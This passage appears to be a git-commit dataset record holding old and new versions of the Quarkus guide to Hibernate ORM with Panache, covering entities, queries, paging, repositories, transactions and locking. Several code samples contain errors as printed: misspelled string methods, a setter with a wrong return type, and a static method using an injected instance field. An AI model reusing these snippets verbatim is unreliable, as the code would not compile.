is allow you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nYou have noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualize the rest. That makes for very concise but yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUppercase();\n }\n \n public String setName(String name){\n this.name = name.toLowercase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all fields calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nint count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream()\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows your to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] [order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nIn Quarkus, every method that modifies the database must be run in a transaction. If you try to modify the database \noutside a transaction you will get an exception. It is not required for querying operations.\n\nYou can annotate any method with `@Transactional` in order to get a transaction. We recommend doing so in your\nREST endpoints where you manipulate entities.\n\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting them handled by the framework, once again we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly deal with, such as:\n\n- Duplicating ID logic: most entities need an ID, most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise to split entity definition (the model) from the operations you can do on them\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in the Object Oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getter and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. \n\n== Defining entities in external projects or jars\n\nHibernate ORM with Panache in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you should build those jars with the Jandex Maven plugin, so that your entities will be indexed and found by Quarkus\nand enhanced:\n\n[source,xml]\n--\n<plugin>\n <groupId>org.jboss.jandex<\/groupId>\n <artifactId>jandex-maven-plugin<\/artifactId>\n <version>1.0.3<\/version>\n <executions>\n <execution>\n <id>make-index<\/id>\n <goals>\n <goal>jandex<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <dependencies>\n <dependency>\n <groupId>org.jboss<\/groupId>\n <artifactId>jandex<\/artifactId>\n <version>2.1.1.Final<\/version>\n <\/dependency>\n <\/dependencies>\n<\/plugin>\n--\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6d8b6fa3592c4a2154e7f0ea07232db0125d36b6","subject":"docs(hibernate): fix typo","message":"docs(hibernate): fix typo\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-orm-panache-guide.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allow you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nYou have noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualize the rest. That makes for very concise but yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUppercase();\n }\n \n public String setName(String name){\n this.name = name.toLowercase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all fields calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new Person();\nperson.name = \"Stef\";\nperson.birth = LocalDate.of(1910, Month.FEBRUARY, 1);\nperson.status = Status.Alive;\n\n\/\/ persist it\nperson.persist();\n\n\/\/ note that once persisted, you don't need to explicitly save your entity: all\n\/\/ modifications are automatically persisted on transaction commit.\n\n\/\/ check if it's persistent\nif(person.isPersistent()){\n \/\/ delete it\n person.delete();\n} \n\n\/\/ getting a list of all Person entities\nList<Person> allPersons = Person.listAll();\n\n\/\/ finding a specific person by ID\nperson = Person.findById(personId);\n\n\/\/ finding all living persons\nList<Person> livingPersons = Person.list(\"status\", Status.Alive);\n\n\/\/ counting all persons\nlong countAll = Person.count();\n\n\/\/ counting all living persons\nlong countAlive = Person.count(\"status\", Status.Alive);\n\n\/\/ delete all living persons\nPerson.delete(\"status\", Status.Alive);\n\n\/\/ delete all persons\nPerson.deleteAll();\n--\n\nAll `list` methods have equivalent `stream` versions.\n\n[source,java]\n--\nStream<Person> persons = Person.streamAll();\nList<String> namesButEmmanuels = persons\n .map(p -> p.name.toLowerCase() )\n .filter( n -> ! \"emmanuel\".equals(n) )\n .collect(Collectors.toList());\n--\n\n== Paging\n\nYou should only use `list` and `stream` methods if your table contains small enough data sets. For larger data\nsets you can use the `find` method equivalents, which return a `PanacheQuery` on which you can do paging:\n\n[source,java]\n--\n\/\/ create a query for all living persons\nPanacheQuery<Person> livingPersons = Person.find(\"status\", Status.Alive);\n\n\/\/ make it use pages of 25 entries at a time\nlivingPersons.page(Page.ofSize(25));\n\n\/\/ get the first page\nList<Person> firstPage = livingPersons.list();\n\n\/\/ get the second page\nList<Person> secondPage = livingPersons.nextPage().list();\n\n\/\/ get page 7\nList<Person> page7 = livingPersons.page(Page.of(7, 25)).list();\n\n\/\/ get the number of pages\nint numberOfPages = livingPersons.pageCount();\n\n\/\/ get the total number of entities returned by this query without paging\nint count = livingPersons.count();\n\n\/\/ and you can chain methods of course\nreturn Person.find(\"status\", Status.Alive)\n .page(Page.ofSize(25))\n .nextPage()\n .stream()\n--\n\nThe `PanacheQuery` type has many other methods to deal with paging and returning streams.\n\n== Sorting\n\nAll methods accepting a query string also accept the following simplified query form:\n\n[source,java]\n--\nList<Person> persons = Person.list(\"order by name,birth\");\n--\n\nBut these methods also accept an optional `Sort` parameter, which allows your to abstract your sorting:\n\n[source,java]\n--\nList<Person> persons = Person.list(Sort.by(\"name\").and(\"birth\"));\n\n\/\/ and with more restrictions\nList<Person> persons = Person.list(\"status\", Sort.by(\"name\").and(\"birth\"), Status.Alive);\n--\n\nThe `Sort` class has plenty of methods for adding columns and specifying sort direction.\n\n== Adding entity methods\n\nIn general, we recommend not adding custom queries for your entities outside of the entities themselves,\nto keep all model queries close to the models they operate on. So we recommend adding them as static methods\nin your entity class:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\n== Simplified queries\n\nNormally, HQL queries are of this form: `from EntityName [where ...] [order by ...]`, with optional elements\nat the end.\n\nIf your query does not start with `from`, we support the following additional forms:\n\n- `order by ...` which will expand to `from EntityName order by ...`\n- `<singleColumnName>` (and single parameter) which will expand to `from EntityName where <singleColumnName> = ?`\n- `<query>` will expand to `from EntityName where <query>`\n\nNOTE: You can also write your queries in plain \nlink:https:\/\/docs.jboss.org\/hibernate\/orm\/5.4\/userguide\/html_single\/Hibernate_User_Guide.html#hql[HQL]:\n\n[source,java]\n--\nOrder.find(\"select distinct o from Order o left join fetch o.lineItems\");\n--\n\n\n== Query parameters\n\nYou can pass query parameters by index (1-based):\n\n[source,java]\n--\nPerson.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive);\n--\n\nOr by name using a `Map`:\n\n[source,java]\n--\nMap<String, Object> params = new HashMap<>();\nparams.put(\"name\", \"stef\");\nparams.put(\"status\", Status.Alive);\nPerson.find(\"name = :name and status = :status\", params);\n--\n\nOr using the convenience class `Parameters` to either build a `Map` or just use as-is:\n\n[source,java]\n--\n\/\/ generate a Map\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive).map());\n\n\/\/ use it as-is\nPerson.find(\"name = :name and status = :status\", \n Parameters.with(\"name\", \"stef\").and(\"status\", Status.Alive));\n--\n\nEvery query operation accepts passing parameters by index (`Object...`), or by name (`Map<String,Object>` or `Parameters`).\n\n== The DAO\/Repository option\n\nLook, we get it: you have a love\/hate relationship with DAOs\/Repositories but you can't live without them. We don't judge, we\nknow life is tough and we've got you covered.\n\nIf you want to have Repositories, you can get the exact same convenient methods injected in your Repository by making it\nimplement `PanacheRepository`:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepository<Person> {\n\n \/\/ put your custom logic here as instance methods\n \n public Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nAbsolutely all the operations that are defined on `PanacheEntityBase` are available on your DAO, so using it\nis exactly the same except you need to inject it:\n\n[source,java]\n--\n@Inject\nPersonRepository personRepository;\n\n@GET\npublic long count(){\n return personRepository.count();\n}\n--\n\nSo if Repositories are your thing, you can keep doing them. Even with repositories, you can keep your entities as\nsubclasses of `PanacheEntity` in order to get the ID and public fields working, but you can even skip that and\ngo back to specifying your ID and using getters and setters if that's your thing. We're not judging.\n\n== Transactions\n\nMake sure to wrap methods modifying your database (e.g. `entity.persist()`) within a transaction. Marking a \nCDI bean method `@Transactional` will do that for you and make that method a transaction boundary. We recommend doing \nso at your application entry point boundaries like your REST endpoint controllers.\n\n== Lock management\n\nPanache does not provide direct support for database locking, but you can do it by injecting the `EntityManager` in your entity (or `PanacheRepository`) and creating a specific method that will use the entity manager to lock the entity after retrieval. The entity manager can also be retrieved via `Panache.getEntityManager()`.\n\nThe following example contains a `findByIdForUpdate` method that finds the entity by primary key then locks it. The lock will generate a `SELECT ... FOR UPDATE` query (the same principle can be used for other kinds of `find*` methods):\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n\n \/\/ inject the EntityManager inside the entity\n @Inject\n EntityManager entityManager;\n \n public static Person findByIdForUpdate(Long id){\n Person person = findById(id);\n \/\/lock with the PESSIMISTIC_WRITE mode type : this will generate a SELECT ... FOR UPDATE query\n entityManager.lock(person, LockModeType.PESSIMISTIC_WRITE);\n return person;\n }\n}\n--\n\nThis will generate two select queries: one to retrieve the entity and the second to lock it. Be careful that locks are released when the transaction ends, so the method that invokes the lock query must be annotated with the `@Transactional` annotation.\n\nWe are currently evaluating adding support for lock management inside Panache. If you are interested, please visit our github issue link:https:\/\/github.com\/quarkusio\/quarkus\/issues\/2744[#2744] and contribute to the discussion.\n\n== Custom IDs\n\nIDs are often a touchy subject, and not everyone's up for letting them handled by the framework, once again we\nhave you covered.\n\nYou can specify your own ID strategy by extending `PanacheEntityBase` instead of `PanacheEntity`. Then\nyou just declare whatever ID you want as a public field:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntityBase {\n\n @Id\n @SequenceGenerator(\n name = \"personSequence\",\n sequenceName = \"person_id_seq\",\n allocationSize = 1,\n initialValue = 4)\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"personSequence\")\n public Integer id;\n\n ...\n}\n--\n\nIf you're using repositories, then you will want to extend `PanacheRepositoryBase` instead of `PanacheRepository`\nand specify your ID type as an extra type parameter:\n\n[source,java]\n--\n@ApplicationScoped\npublic class PersonRepository implements PanacheRepositoryBase<Person,Integer> {\n\n ...\n}\n--\n\n== How and why we simplify Hibernate ORM mappings\n\nWhen it comes to writing Hibernate ORM entities, there are a number of annoying things that users have grown used to \nreluctantly deal with, such as:\n\n- Duplicating ID logic: most entities need an ID, most people don't care how it's set, because it's not really\nrelevant to your model.\n- Dumb getters and setters: since Java lacks support for properties in the language, we have to create fields,\nthen generate getters and setters for those fields, even if they don't actually do anything more than read\/write\nthe fields.\n- Traditional EE patterns advise to split entity definition (the model) from the operations you can do on them\n(DAOs, Repositories), but really that requires an unnatural split between the state and its operations even though\nwe would never do something like that for regular objects in the Object Oriented architecture, where state and methods\nare in the same class. Moreover, this requires two classes per entity, and requires injection of the DAO or Repository\nwhere you need to do entity operations, which breaks your edit flow and requires you to get out of the code you're\nwriting to set up an injection point before coming back to use it.\n- Hibernate queries are super powerful, but overly verbose for common operations, requiring you to write queries even\nwhen you don't need all the parts.\n- Hibernate is very general-purpose, but does not make it trivial to do trivial operations that make up 90% of our\nmodel usage.\n\nWith Panache, we took an opinionated approach to tackle all these problems:\n\n- Make your entities extend `PanacheEntity`: it has an ID field that is auto-generated. If you require\na custom ID strategy, you can extend `PanacheEntityBase` instead and handle the ID yourself.\n- Use public fields. Get rid of dumb getter and setters. Under the hood, we will generate all getters and setters\nthat are missing, and rewrite every access to these fields to use the accessor methods. This way you can still\nwrite _useful_ accessors when you need them, which will be used even though your entity users still use field accesses.\n- Don't use DAOs or Repositories: put all your entity logic in static methods in your entity class. Your entity superclass\ncomes with lots of super useful static methods and you can add your own in your entity class. Users can just start using\nyour entity `Person` by typing `Person.` and getting completion for all the operations in a single place.\n- Don't write parts of the query that you don't need: write `Person.find(\"order by name\")` or\n`Person.find(\"name = ?1 and status = ?2\", \"stef\", Status.Alive)` or even better\n`Person.find(\"name\", \"stef\")`.\n\nThat's all there is to it: with Panache, Hibernate ORM has never looked so trim and neat. \n\n== Defining entities in external projects or jars\n\nHibernate ORM in Quarkus relies on compile-time bytecode enhancements to your entities. If you define your entities in the\nsame project where you build your Quarkus application, everything will work fine. If the entities come from external projects\nor jars, you can make sure that your jar is treated like a Quarkus application library by adding an empty `META-INF\/beans.xml` file.\nThis will allow Quarkus to index and enhance your entities as if they were inside the current project.\n\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Simplified Hibernate ORM with Panache\n\ninclude::.\/attributes.adoc[]\n:config-file: application.properties\n\nHibernate ORM is the de facto JPA implementation and offers you the full breadth of an Object Relational Mapper.\nIt makes complex mappings possible, but it does not make simple and common mappings trivial.\nHibernate ORM with Panache focuses on making your entities trivial and fun to write in {project-name}.\n\n== First: an example\n\nWhat we're doing in Panache is allow you to write your Hibernate ORM entities like this:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n public static Person findByName(String name){\n return find(\"name\", name).firstResult();\n }\n \n public static List<Person> findAlive(){\n return list(\"status\", Status.Alive);\n }\n \n public static void deleteStefs(){\n delete(\"name\", \"Stef\");\n }\n}\n--\n\nYou have noticed how much more compact and readable the code is?\nDoes this look interesting? Read on!\n\nNOTE: the `list()` method might be surprising at first. It takes fragments of HQL (JP-QL) queries and contextualize the rest. That makes for very concise but yet readable code.\n\n== Setting up and configuring Hibernate ORM with Panache\n\nTo get started:\n\n* add your settings in `{config-file}`\n* annotate your entities with `@Entity` and make them extend `PanacheEntity`\n* place your entity logic in static methods in your entities\n\nFollow the link:hibernate-orm-guide.html#setting-up-and-configuring-hibernate-orm-without-persistence-xml-recommended[Hibernate set-up guide for all configuration].\n\nIn your `pom.xml`, add the following dependencies:\n\n* the Panache JPA extension\n* your JDBC driver extension (`quarkus-jdbc-postgresql`, `quarkus-jdbc-h2`, `quarkus-jdbc-mariadb`, ...)\n\n[source,xml]\n--\n<dependencies>\n <!-- Hibernate ORM specific dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-orm-panache<\/artifactId>\n <\/dependency>\n\n <!-- JDBC driver dependencies -->\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-jdbc-postgresql<\/artifactId>\n <\/dependency>\n<\/dependencies>\n--\n\nThen add the relevant configuration properties in `{config-file}`.\n\n[source,properties]\n--\n# configure your datasource\nquarkus.datasource.url = jdbc:postgresql:\/\/localhost:5432\/mydatabase\nquarkus.datasource.driver = org.postgresql.Driver\nquarkus.datasource.username = sarah\nquarkus.datasource.password = connor\n\n# drop and create the database at startup (use `update` to only update the schema)\nquarkus.hibernate-orm.database.generation = drop-and-create\n--\n\n== Defining your entity\n\nTo define a Panache entity, simply extend `PanacheEntity`, annotate it with `@Entity` and add your\ncolumns as public fields:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n}\n--\n\nYou can put all your JPA column annotations on the public fields. If you need a field to not be persisted, use the\n`@Transient` annotation on it. If you need to write accessors, you can:\n\n[source,java]\n--\n@Entity\npublic class Person extends PanacheEntity {\n public String name;\n public LocalDate birth;\n public Status status;\n \n \/\/ this will store all names in lowercase in the DB,\n \/\/ and make them uppercase in the model\n public String getName(){\n return name.toUppercase();\n }\n \n public String setName(String name){\n this.name = name.toLowercase();\n }\n}\n--\n\nAnd thanks to our field access rewrite, when your users read `person.name` they will actually call your `getName()` accessor,\nand similarly for field writes and the setter.\nThis allows for proper encapsulation at runtime as all fields calls will be replaced by the corresponding getter\/setter calls.\n\n== Most useful operations\n\nOnce you have written your entity, here are the most common operations you will be able to do:\n\n[source,java]\n--\n\/\/ creating a person\nPerson person = new 